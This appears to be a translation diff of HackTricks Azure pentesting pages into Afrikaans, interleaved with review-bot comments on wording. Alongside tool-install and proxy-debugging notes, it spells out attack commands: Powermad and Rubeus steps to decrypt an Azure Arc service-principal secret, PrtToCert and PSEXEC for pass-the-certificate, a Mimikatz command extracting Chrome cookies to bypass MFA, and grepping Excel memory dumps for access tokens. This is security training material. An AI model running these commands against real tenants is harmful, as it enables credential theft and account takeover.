{{#include ../../banners/hacktricks-training.md}}
## Install PowerShell in Linux
## Installeer PowerShell in Linux
> [!TIP]
> In linux you will need to install PowerShell Core:
> In linux moet jy PowerShell Core installeer:
>
> ```bash
> sudo apt-get update
@@ -14,11 +14,11 @@
> # Ubuntu 20.04
> wget -q https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb
>
> # Update repos
> # Werk repos op
> sudo apt-get update
> sudo add-apt-repository universe
>
> # Install & start powershell
> # Installeer & begin powershell
> sudo apt-get install -y powershell
> pwsh
>
@@ -26,58 +26,47 @@
> curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
> ```
## Install PowerShell in MacOS
## Installeer PowerShell in MacOS
Instructions from the [**documentation**](https://learn.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.4):
1. Install `brew` if not installed yet:
Instruksies van die [**dokumentasie**](https://learn.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.4):
1. Installeer `brew` as dit nog nie geïnstalleer is nie:
```bash
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
```
2. Install the latest stable release of PowerShell:
2. Installeer die nuutste stabiele weergawe van PowerShell:
```sh
brew install powershell/tap/powershell
```
3. Run PowerShell:
3. Voer PowerShell uit:
```sh
pwsh
```
4. Update:
4. Opdatering:
```sh
brew update
brew upgrade powershell
```
## Main Enumeration Tools
## Hoof Enumerasie Gereedskap
### az cli
[**Azure Command-Line Interface (CLI)**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli) is a cross-platform tool written in Python for managing and administering (most) Azure and Entra ID resources. It connects to Azure and executes administrative commands via the command line or scripts.
[**Azure Command-Line Interface (CLI)**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli) is 'n kruis-platform hulpmiddel geskryf in Python vir die bestuur en administrasie van (meeste) Azure en Entra ID hulpbronne. Dit maak verbinding met Azure en voer administratiewe opdragte uit via die opdraglyn of skripte.
Follow this link for the [**installation instructions¡**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli#install).
Volg hierdie skakel vir die [**installasie instruksies¡**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli#install).
Commands in Azure CLI are structured using a pattern of: `az <service> <action> <parameters>`
Opdragte in Azure CLI is gestruktureer volgens 'n patroon van: `az <service> <action> <parameters>`
#### Debug | MitM az cli
Using the parameter **`--debug`** it's possible to see all the requests the tool **`az`** is sending:
Deur die parameter **`--debug`** is dit moontlik om al die versoeke wat die hulpmiddel **`az`** stuur te sien:
```bash
az account management-group list --output table --debug
```
In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can do:
Om 'n **MitM** op die hulpmiddel te doen en **al die versoeke** wat dit handmatig stuur te kontroleer, kan jy doen:
{{#tabs }}
{{#tab name="Bash" }}
```bash
export ADAL_PYTHON_SSL_NO_VERIFY=1
export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
@@ -90,64 +79,53 @@ export HTTP_PROXY="http://127.0.0.1:8080"
openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM
export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem
```
{{#endtab }}
{{#tab name="PS" }}
```bash
$env:ADAL_PYTHON_SSL_NO_VERIFY=1
$env:AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
$env:HTTPS_PROXY="http://127.0.0.1:8080"
$env:HTTP_PROXY="http://127.0.0.1:8080"
```
{{#endtab }}
{{#endtabs }}
### Az PowerShell
Azure PowerShell is a module with cmdlets for managing Azure resources directly from the PowerShell command line.
Azure PowerShell is 'n module met cmdlets om Azure hulpbronne direk vanaf die PowerShell-opdraglyn te bestuur.
Follow this link for the [**installation instructions**](https://learn.microsoft.com/en-us/powershell/azure/install-azure-powershell).
Volg hierdie skakel vir die [**installasie-instruksies**](https://learn.microsoft.com/en-us/powershell/azure/install-azure-powershell).
Commands in Azure PowerShell AZ Module are structured like: `<Action>-Az<Service> <parameters>`
Opdragte in Azure PowerShell AZ Module is gestruktureer soos: `<Action>-Az<Service> <parameters>`
#### Debug | MitM Az PowerShell
Using the parameter **`-Debug`** it's possible to see all the requests the tool is sending:
Deur die parameter **`-Debug`** is dit moontlik om al die versoeke wat die hulpmiddel stuur te sien:
```bash
Get-AzResourceGroup -Debug
```
In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can set the env variables `HTTPS_PROXY` and `HTTP_PROXY` according to the [**docs**](https://learn.microsoft.com/en-us/powershell/azure/az-powershell-proxy).
Om 'n **MitM** op die hulpmiddel te doen en **al die versoeke** wat dit handmatig stuur te kontroleer, kan jy die omgewing veranderlikes `HTTPS_PROXY` en `HTTP_PROXY` instel volgens die [**dokumentasie**](https://learn.microsoft.com/en-us/powershell/azure/az-powershell-proxy).
### Microsoft Graph PowerShell
Microsoft Graph PowerShell is a cross-platform SDK that enables access to all Microsoft Graph APIs, including services like SharePoint, Exchange, and Outlook, using a single endpoint. It supports PowerShell 7+, modern authentication via MSAL, external identities, and advanced queries. With a focus on least privilege access, it ensures secure operations and receives regular updates to align with the latest Microsoft Graph API features.
Microsoft Graph PowerShell is 'n kruis-platform SDK wat toegang tot al die Microsoft Graph API's moontlik maak, insluitend dienste soos SharePoint, Exchange, en Outlook, met 'n enkele eindpunt. Dit ondersteun PowerShell 7+, moderne verifikasie via MSAL, eksterne identiteite, en gevorderde navrae. Met 'n fokus op die minste privaatheidstoegang, verseker dit veilige bedrywighede en ontvang gereelde opdaterings om in lyn te wees met die nuutste Microsoft Graph API kenmerke.
Follow this link for the [**installation instructions**](https://learn.microsoft.com/en-us/powershell/microsoftgraph/installation).
Volg hierdie skakel vir die [**installasie instruksies**](https://learn.microsoft.com/en-us/powershell/microsoftgraph/installation).
Commands in Microsoft Graph PowerShell are structured like: `<Action>-Mg<Service> <parameters>`
Opdragte in Microsoft Graph PowerShell is gestruktureer soos: `<Action>-Mg<Service> <parameters>`
#### Debug Microsoft Graph PowerShell
Using the parameter **`-Debug`** it's possible to see all the requests the tool is sending:
#### Foutopsporing van Microsoft Graph PowerShell
Met die parameter **`-Debug`** is dit moontlik om al die versoeke wat die hulpmiddel stuur te sien:
```bash
Get-MgUser -Debug
```
### ~~**AzureAD Powershell**~~
The Azure Active Directory (AD) module, now **deprecated**, is part of Azure PowerShell for managing Azure AD resources. It provides cmdlets for tasks like managing users, groups, and application registrations in Entra ID.
Die Azure Active Directory (AD) module, nou **verouderd**, is deel van Azure PowerShell vir die bestuur van Azure AD hulpbronne. Dit bied cmdlets vir take soos die bestuur van gebruikers, groepe, en aansoekregistrasies in Entra ID.
> [!TIP]
> This is replaced by Microsoft Graph PowerShell
Follow this link for the [**installation instructions**](https://www.powershellgallery.com/packages/AzureAD).
> Dit is vervang deur Microsoft Graph PowerShell
Volg hierdie skakel vir die [**installasie-instruksies**](https://www.powershellgallery.com/packages/AzureAD).
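Review bot: "least privilege access" has become "minste privaatheidstoegang" in the Microsoft Graph PowerShell paragraph; "privaatheid" means privacy, so this should read "minste voorregte" (least privilege). Two consistency points: the "#### Debug Microsoft Graph PowerShell" heading is translated ("#### Foutopsporing van Microsoft Graph PowerShell") while the earlier "#### Debug | MitM az cli" and "#### Debug | MitM Az PowerShell" headings stay in English, so pick one convention; and the link text "installasie instruksies¡" in the az cli section of the previous hunk keeps the stray "¡" from the source and should lose it. Unrelated to the translation but worth fixing in the same pass: the "PS" tab is fenced as ```bash although it contains PowerShell.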

View File

@@ -4,17 +4,16 @@
### Identifying the Issues
Azure Arc allows for the integration of new internal servers (joined domain servers) into Azure Arc using the Group Policy Object method. To facilitate this, Microsoft provides a deployment toolkit necessary for initiating the onboarding procedure. Inside the ArcEnableServerGroupPolicy.zip file, the following scripts can be found: DeployGPO.ps1, EnableAzureArc.ps1, and AzureArcDeployment.psm1.
Azure Arc stel die integrasie van nuwe interne bedieners (aangeslote domeinbedieners) in Azure Arc via die Groep Beleidsobjek metode moontlik. Om dit te fasiliteer, bied Microsoft 'n ontplooiing toolkit wat nodig is om die aanmeldproses te begin. Binne die ArcEnableServerGroupPolicy.zip lêer, kan die volgende skripte gevind word: DeployGPO.ps1, EnableAzureArc.ps1, en AzureArcDeployment.psm1.
When executed, the DeployGPO.ps1 script performs the following actions:
Wanneer uitgevoer, voer die DeployGPO.ps1 skrip die volgende aksies uit:
1. Creates the Azure Arc Servers Onboarding GPO within the local domain.
2. Copies the EnableAzureArc.ps1 onboarding script to the designated network share created for the onboarding process, which also contains the Windows installer package.
1. Skep die Azure Arc Servers Onboarding GPO binne die plaaslike domein.
2. Kopieer die EnableAzureArc.ps1 aanmeldskrip na die aangewese netwerkdeel wat geskep is vir die aanmeldproses, wat ook die Windows installer pakket bevat.
When running this script, sys admins need to provide two main parameters: **ServicePrincipalId** and **ServicePrincipalClientSecret**. Additionally, it requires other parameters such as the domain, the FQDN of the server hosting the share, and the share name. Further details such as the tenant ID, resource group, and other necessary information must also be provided to the script.
An encrypted secret is generated in the AzureArcDeploy directory on the specified share using DPAPI-NG encryption. The encrypted secret is stored in a file named encryptedServicePrincipalSecret. Evidence of this can be found in the DeployGPO.ps1 script, where the encryption is performed by calling ProtectBase64 with $descriptor and $ServicePrincipalSecret as inputs. The descriptor consists of the Domain Computer and Domain Controller group SIDs, ensuring that the ServicePrincipalSecret can only be decrypted by the Domain Controllers and Domain Computers security groups, as noted in the script comments.
Wanneer hierdie skrip uitgevoer word, moet stelselsadmins twee hoofparameters verskaf: **ServicePrincipalId** en **ServicePrincipalClientSecret**. Daarbenewens vereis dit ander parameters soos die domein, die FQDN van die bediener wat die deel huisves, en die deelnaam. Verdere besonderhede soos die tenant ID, hulpbron groep, en ander nodige inligting moet ook aan die skrip verskaf word.
'n Geënkripteerde geheim word in die AzureArcDeploy gids op die gespesifiseerde deel gegenereer met behulp van DPAPI-NG enkripsie. Die geënkripteerde geheim word in 'n lêer genaamd encryptedServicePrincipalSecret gestoor. Bewyse hiervan kan in die DeployGPO.ps1 skrip gevind word, waar die enkripsie uitgevoer word deur ProtectBase64 met $descriptor en $ServicePrincipalSecret as insette aan te roep. Die descriptor bestaan uit die Domein Rekenaar en Domein Beheerder groep SIDs, wat verseker dat die ServicePrincipalSecret slegs deur die Domein Beheerders en Domein Rekenaar sekuriteitsgroepe ontkripteer kan word, soos opgemerk in die skrip kommentaar.
```powershell
# Encrypting the ServicePrincipalSecret to be decrypted only by the Domain Controllers and the Domain Computers security groups
$DomainComputersSID = "SID=" + $DomainComputersSID
@@ -23,24 +22,20 @@ $descriptor = @($DomainComputersSID, $DomainControllersSID) -join " OR "
Import-Module $PSScriptRoot\AzureArcDeployment.psm1
$encryptedSecret = [DpapiNgUtil]::ProtectBase64($descriptor, $ServicePrincipalSecret)
```
### Exploit
We have the follow conditions:
Ons het die volgende toestande:
1. We have successfully penetrated the internal network.
2. We have the capability to create or assume control of a computer account within Active Directory.
3. We have discovered a network share containing the AzureArcDeploy directory.
There are several methods to obtain a machine account within an AD environment. One of the most common is exploiting the machine account quota. Another method involves compromising a machine account through vulnerable ACLs or various other misconfigurations.
1. Ons het suksesvol die interne netwerk binnegedring.
2. Ons het die vermoë om 'n rekenaarrekening binne Active Directory te skep of te beheer.
3. Ons het 'n netwerkdeel ontdek wat die AzureArcDeploy-gids bevat.
Daar is verskeie metodes om 'n masjienrekening binne 'n AD-omgewing te verkry. Een van die mees algemene is om die masjienrekeningkwota te benut. 'n Ander metode behels die kompromittering van 'n masjienrekening deur kwesbare ACL's of verskeie ander miskonfigurasies.
```powershell
Import-MKodule powermad
New-MachineAccount -MachineAccount fake01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
```
Once a machine account is obtained, it is possible to authenticate using this account. We can either use the runas.exe command with the netonly flag or use pass-the-ticket with Rubeus.exe.
Sodra 'n masjienrekening verkry is, is dit moontlik om te autentiseer met hierdie rekening. Ons kan of die runas.exe-opdrag met die netonly-vlag gebruik of pass-the-ticket met Rubeus.exe gebruik.
```powershell
runas /user:fake01$ /netonly powershell
```
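Review bot: "Import-MKodule powermad" in the machine-account snippet is a typo for "Import-Module powermad" and is carried through unchanged as context; the command fails as written, so fix it while touching this file. In the conditions list, "toestande" for "conditions" reads as physical states; "voorwaardes" is the usual word, and the English "We have the follow conditions:" above it also needs "following".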
@@ -48,9 +43,7 @@ runas /user:fake01$ /netonly powershell
```powershell
.\Rubeus.exe asktgt /user:fake01$ /password:123456 /prr
```
By having the TGT for our computer account stored in memory, we can use the following script to decrypt the service principal secret.
Deur die TGT vir ons rekenaarrekening in geheue te stoor, kan ons die volgende skrip gebruik om die dienshoofsekrte te ontsleutel.
```powershell
Import-Module .\AzureArcDeployment.psm1
@@ -59,17 +52,12 @@ $encryptedSecret = Get-Content "[shared folder path]\AzureArcDeploy\encryptedSer
$ebs = [DpapiNgUtil]::UnprotectBase64($encryptedSecret)
$ebs
```
Alternatiewelik kan ons [SecretManagement.DpapiNG](https://github.com/jborean93/SecretManagement.DpapiNG) gebruik.
Alternatively, we can use [SecretManagement.DpapiNG](https://github.com/jborean93/SecretManagement.DpapiNG).
At this point, we can gather the remaining information needed to connect to Azure from the ArcInfo.json file, which is stored on the same network share as the encryptedServicePrincipalSecret file. This file contains details such as: TenantId, servicePrincipalClientId, ResourceGroup, and more. With this information, we can use Azure CLI to authenticate as the compromised service principal.
Op hierdie punt kan ons die oorblywende inligting versamel wat nodig is om met Azure te verbind vanaf die ArcInfo.json-lêer, wat op dieselfde netwerkdeel as die encryptedServicePrincipalSecret-lêer gestoor is. Hierdie lêer bevat besonderhede soos: TenantId, servicePrincipalClientId, ResourceGroup, en meer. Met hierdie inligting kan ons Azure CLI gebruik om as die gecompromitteerde dienshoof te autentiseer.
## References
- [https://xybytes.com/azure/Abusing-Azure-Arc/](https://xybytes.com/azure/Abusing-Azure-Arc/)
{{#include ../../../banners/hacktricks-training.md}}
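Review bot: "dienshoofsekrte" in the sentence after the Rubeus block is a typo; the rest of this file uses "geheim" for the service principal secret ("Geënkripteerde geheim"), so "dienshoofgeheim" keeps the terminology consistent. "gecompromitteerde" in the last paragraph is the Dutch spelling; Afrikaans is "gekompromitteerde".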

View File

@@ -1,43 +1,39 @@
# Az - Local Cloud Credentials
# Az - Plaaslike Wolk Krediete
{{#include ../../../banners/hacktricks-training.md}}
## Local Token Storage and Security Considerations
## Plaaslike Token Berging en Sekuriteits oorwegings
### Azure CLI (Command-Line Interface)
### Azure CLI (Opdraglyn Koppelvlak)
Tokens and sensitive data are stored locally by Azure CLI, raising security concerns:
Tokens en sensitiewe data word plaaslik deur Azure CLI gestoor, wat sekuriteits bekommernisse oproep:
1. **Access Tokens**: Stored in plaintext within `accessTokens.json` located at `C:\Users\<username>\.Azure`.
2. **Subscription Information**: `azureProfile.json`, in the same directory, holds subscription details.
3. **Log Files**: The `ErrorRecords` folder within `.azure` might contain logs with exposed credentials, such as:
- Executed commands with credentials embedded.
- URLs accessed using tokens, potentially revealing sensitive information.
1. **Toegangstokens**: Gestoor in platte teks binne `accessTokens.json` geleë by `C:\Users\<username>\.Azure`.
2. **Subskripsie Inligting**: `azureProfile.json`, in dieselfde gids, hou subskripsie besonderhede.
3. **Loglêers**: Die `ErrorRecords` vouer binne `.azure` mag loglêers bevat met blootgestelde krediete, soos:
- Uitgevoerde opdragte met krediete ingebed.
- URL's wat met tokens toeganklik gemaak is, wat moontlik sensitiewe inligting kan onthul.
### Azure PowerShell
Azure PowerShell also stores tokens and sensitive data, which can be accessed locally:
Azure PowerShell stoor ook tokens en sensitiewe data, wat plaaslik toeganklik is:
1. **Access Tokens**: `TokenCache.dat`, located at `C:\Users\<username>\.Azure`, stores access tokens in plaintext.
2. **Service Principal Secrets**: These are stored unencrypted in `AzureRmContext.json`.
3. **Token Saving Feature**: Users have the ability to persist tokens using the `Save-AzContext` command, which should be used cautiously to prevent unauthorized access.
1. **Toegangstokens**: `TokenCache.dat`, geleë by `C:\Users\<username>\.Azure`, stoor toegangstokens in platte teks.
2. **Diens Prinsipaal Geheimen**: Hierdie word ongeënkripteer in `AzureRmContext.json` gestoor.
3. **Token Stoor Funksie**: Gebruikers het die vermoë om tokens te behou met die `Save-AzContext` opdrag, wat versigtig gebruik moet word om ongeoorloofde toegang te voorkom.
## Automatic Tools to find them
## Outomatiese Gereedskap om hulle te vind
- [**Winpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe)
- [**Get-AzurePasswords.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/AzureRM/Get-AzurePasswords.ps1)
## Security Recommendations
## Sekuriteits Aanbevelings
Considering the storage of sensitive data in plaintext, it's crucial to secure these files and directories by:
Aangaande die berging van sensitiewe data in platte teks, is dit noodsaaklik om hierdie lêers en gidse te beveilig deur:
- Limiting access rights to these files.
- Regularly monitoring and auditing these directories for unauthorized access or unexpected changes.
- Employing encryption for sensitive files where possible.
- Educating users about the risks and best practices for handling such sensitive information.
- Toegangregte tot hierdie lêers te beperk.
- Gereeld hierdie gidse te monitor en te oudit vir ongeoorloofde toegang of onverwagte veranderinge.
- Enkripsie vir sensitiewe lêers waar moontlik toe te pas.
- Gebruikers op te voed oor die risiko's en beste praktyke vir die hantering van sulke sensitiewe inligting.
{{#include ../../../banners/hacktricks-training.md}}
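Review bot: "Krediete" in the title "Az - Plaaslike Wolk Krediete" and in "blootgestelde krediete" means credits, not credentials; "geloofsbriewe" (or "aanmeldbewyse") is the intended word. Two smaller points in the same hunk: "Diens Prinsipaal Geheimen" uses the Dutch plural, Afrikaans is "geheime"; and "vouer" in the ErrorRecords item sits next to "gids" in the item above it for the same English word "directory/folder", so use one term.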

View File

@@ -4,40 +4,32 @@
## Pass the Certificate (Azure)
In Azure joined machines, it's possible to authenticate from one machine to another using certificates that **must be issued by Azure AD CA** for the required user (as the subject) when both machines support the **NegoEx** authentication mechanism.
In Azure-verbonden masjiene is dit moontlik om van een masjien na 'n ander te autentiseer met behulp van sertifikate wat **uitgereik moet word deur Azure AD CA** vir die vereiste gebruiker (as die onderwerp) wanneer beide masjiene die **NegoEx** autentifikasiemeganisme ondersteun.
In super simplified terms:
In super vereenvoudigde terme:
- The machine (client) initiating the connection **needs a certificate from Azure AD for a user**.
- Client creates a JSON Web Token (JWT) header containing PRT and other details, sign it using the Derived key (using the session key and the security context) and **sends it to Azure AD**
- Azure AD verifies the JWT signature using client session key and security context, checks validity of PRT and **responds** with the **certificate**.
- Die masjien (klient) wat die verbinding begin **het 'n sertifikaat van Azure AD vir 'n gebruiker** nodig.
- Klient skep 'n JSON Web Token (JWT) kop wat PRT en ander besonderhede bevat, teken dit met behulp van die Afgeleide sleutel (met die sessiesleutel en die sekuriteitskonteks) en **stuur dit na Azure AD**.
- Azure AD verifieer die JWT-handtekening met behulp van die klient se sessiesleutel en sekuriteitskonteks, kontroleer die geldigheid van PRT en **antwoord** met die **sertifikaat**.
In this scenario and after grabbing all the info needed for a [**Pass the PRT**](pass-the-prt.md) attack:
In hierdie scenario en nadat al die inligting wat nodig is vir 'n [**Pass the PRT**](pass-the-prt.md) aanval verkry is:
- Username
- Tenant ID
- Gebruikersnaam
- Huurder ID
- PRT
- Security context
- Derived Key
It's possible to **request P2P certificate** for the user with the tool [**PrtToCert**](https://github.com/morRubin/PrtToCert)**:**
- Sekuriteitskonteks
- Afgeleide Sleutel
Dit is moontlik om 'n **P2P-sertifikaat** vir die gebruiker aan te vra met die hulpmiddel [**PrtToCert**](https://github.com/morRubin/PrtToCert)**:**
```bash
RequestCert.py [-h] --tenantId TENANTID --prt PRT --userName USERNAME --hexCtx HEXCTX --hexDerivedKey HEXDERIVEDKEY [--passPhrase PASSPHRASE]
```
The certificates will last the same as the PRT. To use the certificate you can use the python tool [**AzureADJoinedMachinePTC**](https://github.com/morRubin/AzureADJoinedMachinePTC) that will **authenticate** to the remote machine, run **PSEXEC** and **open a CMD** on the victim machine. This will allow us to use Mimikatz again to get the PRT of another user.
Die sertifikate sal so lank duur as die PRT. Om die sertifikaat te gebruik, kan jy die python hulpmiddel [**AzureADJoinedMachinePTC**](https://github.com/morRubin/AzureADJoinedMachinePTC) gebruik wat **authentiseer** na die afstandmasjien, **PSEXEC** uitvoer en 'n **CMD** op die slagoffer masjien oopmaak. Dit sal ons toelaat om Mimikatz weer te gebruik om die PRT van 'n ander gebruiker te verkry.
```bash
Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP
```
## Verwysings
## References
- For more details about how Pass the Certificate works check the original post [https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597)
- Vir meer besonderhede oor hoe Pass the Certificate werk, kyk na die oorspronklike pos [https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597)
{{#include ../../../banners/hacktricks-training.md}}
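Review bot: "Huurder ID" for "Tenant ID" conflicts with the Azure Arc page in this same commit, which keeps "tenant ID" untranslated; since "tenant" is the Entra term the reader sees in the portal, keep "Tenant ID". Also "authentiseer" in the last paragraph is a third spelling alongside "autentiseer" (Azure Arc page) and "autentifikasiemeganisme" earlier in this hunk; settle on one. "Azure-verbonden" is the Dutch participle; Afrikaans is "Azure-verbonde".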

View File

@@ -2,40 +2,34 @@
{{#include ../../../banners/hacktricks-training.md}}
## Why Cookies?
## Waarom Koekies?
Browser **cookies** are a great mechanism to **bypass authentication and MFA**. Because the user has already authenticated in the application, the session **cookie** can just be used to **access data** as that user, without needing to re-authenticate.
Bladsy **koekies** is 'n uitstekende meganisme om **authentisering en MFA** te **omseil**. Omdat die gebruiker reeds in die toepassing geverifieer is, kan die sessie **koekie** net gebruik word om **data** as daardie gebruiker te **toegang**, sonder om weer te verifieer.
You can see where are **browser cookies located** in:
Jy kan sien waar **bladsy koekies geleë** is in:
{{#ref}}
https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts?q=browse#google-chrome
{{#endref}}
## Attack
## Aanval
The challenging part is that those **cookies are encrypted** for the **user** via the Microsoft Data Protection API (**DPAPI**). This is encrypted using cryptographic [keys tied to the user](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) the cookies belong to. You can find more information about this in:
Die uitdagende deel is dat daardie **koekies geënkripteer** is vir die **gebruiker** via die Microsoft Data Protection API (**DPAPI**). Dit is geënkripteer met kriptografiese [sleutels wat aan die gebruiker gekoppel is](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) waartoe die koekies behoort. Jy kan meer inligting hieroor vind in:
{{#ref}}
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords
{{#endref}}
With Mimikatz in hand, I am able to **extract a users cookies** even though they are encrypted with this command:
Met Mimikatz in die hand, kan ek **'n gebruiker se koekies** onttrek, selfs al is hulle geënkripteer met hierdie opdrag:
```bash
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
```
Vir Azure, is ons bekommerd oor die outentikasie koekies insluitend **`ESTSAUTH`**, **`ESTSAUTHPERSISTENT`**, en **`ESTSAUTHLIGHT`**. Daardie is daar omdat die gebruiker onlangs aktief op Azure was.
For Azure, we care about the authentication cookies including **`ESTSAUTH`**, **`ESTSAUTHPERSISTENT`**, and **`ESTSAUTHLIGHT`**. Those are there because the user has been active on Azure lately.
Just navigate to login.microsoftonline.com and add the cookie **`ESTSAUTHPERSISTENT`** (generated by “Stay Signed In” option) or **`ESTSAUTH`**. And you will be authenticated.
Net navigeer na login.microsoftonline.com en voeg die koekie **`ESTSAUTHPERSISTENT`** (gegenereer deur die “Bly Teken In” opsie) of **`ESTSAUTH`** by. En jy sal outentiseer wees.
## References
- [https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/](https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/)
{{#include ../../../banners/hacktricks-training.md}}
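Review bot: "Bladsy koekies" translates "page cookies", not "browser cookies"; "blaaierkoekies" is meant, both in the first paragraph and in "waar bladsy koekies geleë is". In the same paragraph "om data as daardie gebruiker te toegang" uses a noun as a verb; "om as daardie gebruiker toegang tot data te verkry" reads correctly. The closing line "En jy sal outentiseer wees" needs the participle "geoutentiseer", and "outentikasie"/"outentiseer" is yet another spelling of authenticate next to "autentiseer" used elsewhere in this commit.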

View File

@@ -1,11 +1,7 @@
# Az - Phishing Primary Refresh Token (Microsoft Entra)
# Az - Phishing Primêre Vernuwings Teken (Microsoft Entra)
{{#include ../../../banners/hacktricks-training.md}}
**Check:** [**https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/**](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/)
**Kontroleer:** [**https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/**](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/)
{{#include ../../../banners/hacktricks-training.md}}
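Review bot: "**Kontroleer:**" for "**Check:**" means verify/inspect; since the line only points the reader to an external post, "**Kyk:**" matches the "Kyk na die pos in" wording used on the PRT page in this same commit.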

View File

@@ -1,11 +1,7 @@
# Az - Primary Refresh Token (PRT)
# Az - Primêre Vernuwings Teken (PRT)
{{#include ../../../banners/hacktricks-training.md}}
**Chec the post in** [**https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) although another post explaining the same can be found in [**https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30**](https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30)
**Kyk na die pos in** [**https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) alhoewel 'n ander pos wat dieselfde verduidelik, gevind kan word in [**https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30**](https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30)
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -2,16 +2,15 @@
{{#include ../../../banners/hacktricks-training.md}}
## **Basic Information**
## **Basiese Inligting**
As explained in [**this video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), some Microsoft software synchronized with the cloud (Excel, Teams...) might **store access tokens in clear-text in memory**. So just **dumping** the **memory** of the process and **grepping for JWT tokens** might grant you access over several resources of the victim in the cloud bypassing MFA.
Soos verduidelik in [**hierdie video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), sommige Microsoft sagteware wat met die wolk gesinkroniseer is (Excel, Teams...) mag **toegangstokens in duidelike teks in geheue stoor**. So net **dumping** die **geheue** van die proses en **grepping vir JWT tokens** mag jou toegang gee tot verskeie hulpbronne van die slagoffer in die wolk terwyl jy MFA omseil.
Steps:
1. Dump the excel processes synchronized with in EntraID user with your favourite tool.
2. Run: `string excel.dmp | grep 'eyJ0'` and find several tokens in the output
3. Find the tokens that interest you the most and run tools over them:
Stappe:
1. Dump die excel prosesse wat gesinkroniseer is met die EntraID gebruiker met jou gunsteling hulpmiddel.
2. Voer in: `string excel.dmp | grep 'eyJ0'` en vind verskeie tokens in die uitvoer
3. Vind die tokens wat jou die meeste interesseer en voer hulpmiddels oor hulle uit:
```bash
# Check the identity of the token
curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/me | jq
@@ -31,11 +30,6 @@ curl -s -H "Authorization: Bearer <token>" 'https://graph.microsoft.com/v1.0/sit
┌──(magichk㉿black-pearl)-[~]
└─$ curl -o <filename_output> -L -H "Authorization: Bearer <token>" '<@microsoft.graph.downloadUrl>'
```
**Note that these kind of access tokens can be also found inside other processes.**
**Let daarop dat hierdie tipe toegangstokens ook binne ander prosesse gevind kan word.**
{{#include ../../../banners/hacktricks-training.md}}
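Review bot: step 2 keeps "string excel.dmp | grep 'eyJ0'" from the source, but the tool that extracts printable text from a memory dump is "strings", so the command fails as written in both versions; fix it to "strings excel.dmp | grep 'eyJ0'". In the same step "Voer in:" (enter) should be "Voer uit:" (run), matching "Run:" in the source.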

View File

@@ -1,11 +1,7 @@
# Az - Permissions for a Pentest
# Az - Toestemmings vir 'n Pentest
{{#include ../../banners/hacktricks-training.md}}
To start the tests you should have access with a user with **Reader permissions over the subscription** and **Global Reader role in AzureAD**. If even in that case you are **not able to access the content of the Storage accounts** you can fix it with the **role Storage Account Contributor**.
Om die toetse te begin, moet jy toegang hê met 'n gebruiker met **Leser toestemmings oor die subskripsie** en **Globale Leser rol in AzureAD**. As jy selfs in daardie geval **nie in staat is om toegang te verkry tot die inhoud van die Stoor rekeninge** nie, kan jy dit regstel met die **rol Stoor Rekening Bydraer**.
{{#include ../../banners/hacktricks-training.md}}
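Review bot: the role names "Reader", "Global Reader" and "Storage Account Contributor" are translated to "Leser", "Globale Leser" and "Stoor Rekening Bydraer", but these are the literal Azure RBAC and Entra role identifiers a tester has to look up in the portal or pass to the CLI, so keep them in English, optionally with the Afrikaans gloss in brackets.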